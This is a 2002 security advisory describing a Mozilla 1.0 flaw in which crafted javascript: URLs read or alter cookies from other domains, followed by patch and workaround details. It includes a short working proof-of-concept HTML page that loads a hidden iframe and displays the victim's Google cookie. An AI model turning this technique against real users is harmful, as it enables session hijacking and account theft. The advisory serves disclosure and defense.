COMMAND

	Mozilla cookie can be stollen & spoofed

SYSTEMS AFFECTED

	Mozilla 1.0

PROBLEM

	Thanks to :
	

	                                                   _     _

	                                                 o' ,=./ `o

	Andreas Sandblad [sandblad@acc.umu.se]              (o o)        advisory [#9]

	---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

	Credits to Ingesson, Quitta, Hawkan.

	

	

	

	BACKGROUND:

	===========

	

	I orginally thought this was a XSS (cross  site  scripting)  issue,  but
	soon came to the conclusion that it is limited  to  a  design  error  in
	restricting access to cookies. Even though Mozilla  is  open  source,  I
	have not been studying the source code in order to find and exploit  the
	vulnerability.
	

	In the beginning I had problems not  generating  any  javascript  errors
	when using the javascript URL. My first solution was to  make  the  host
	and path to be a valid javascript expression. Google.com may be a  valid
	expression if google is an object and com is an element/variable of  the
	Google object. Further on if Google.com is an int, it is  legal  to  use
	google.com/ 1. Parsing of host and  path  will  stop  when  a  space  is
	found.
	

	Well, I soon found a much easier solution. Simply put a // in  front  of
	the host and path and a \n before the cookie reading  code  accour.  The
	reason why I didn't find this directly was because the newline  must  be
	created in a  javascript  function.  It  can't  be  set  directly  in  a
	javascript url.
	

	

	DESCRIPTION:

	============

	

	Mozilla allows script in  the  javascript  protocoll  to  set  and  read
	cookies. For javascript URLs the host and path for the cookie is  pulled
	out as: "javascript:[host][path]"
	

	Cookie security is based only on restricting access to correct  matching
	host and path. By carefully crafting a mallicious javascript URL  opened
	in a new  frame/iframe/window,  it  is  possible  to  access  and  alter
	cookies from other domains.
	

	

	DETAILS:

	========

	

	The easiest way to exploit the  vulnerability  is  to  simply  create  a
	javascript     URL      in      a      javascript      function      as:
	javascript://[host]/[path]\n[code to read cookie] The // will make  sure
	host and path don't generate any javascript errors.
	

	

	EXPLOIT:

	========

	

	Instructions: Put the exploit in a html document on a remote server  and
	load it with your Mozilla browser to activate the exploit.
	

	-------------------------- CUT HERE ----------------------------

	<pre>

	Title:      Mozilla cookie stealing/spoofing

	Date:       [2002-07-24]

	Impact:     Steal/spoof arbitrary cookie           _     _

	            using javascript: URLs               o' \,=./ `o

	Author:     Andreas Sandblad, sandblad@acc.umu.se   (o o)

	---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

	This demo will display your google cookie (must exist).

	</pre>

	

	<body onload=init()>

	<iframe name=f height=0 width=0 style=visibility:hidden></iframe>

	<script>

	function init(){

	  f.location = "javascript://www.google.com/\n"+

	    "'<body onload=alert(document.cookie)>'";

	}

	</script>

	-------------------------- CUT HERE ----------------------------

	

SOLUTION

	 Patch

	 =====

	

	The author has been working with Mozilla to produce a patch. Problem  is
	fixed in Mozilla 1.1 Beta released 02-07-22.
	

	 Workaround

	 ==========

	

	In
	

	Preferences->Advanced->Scripts & Plugins->

	

	Disable access to cookies using javascript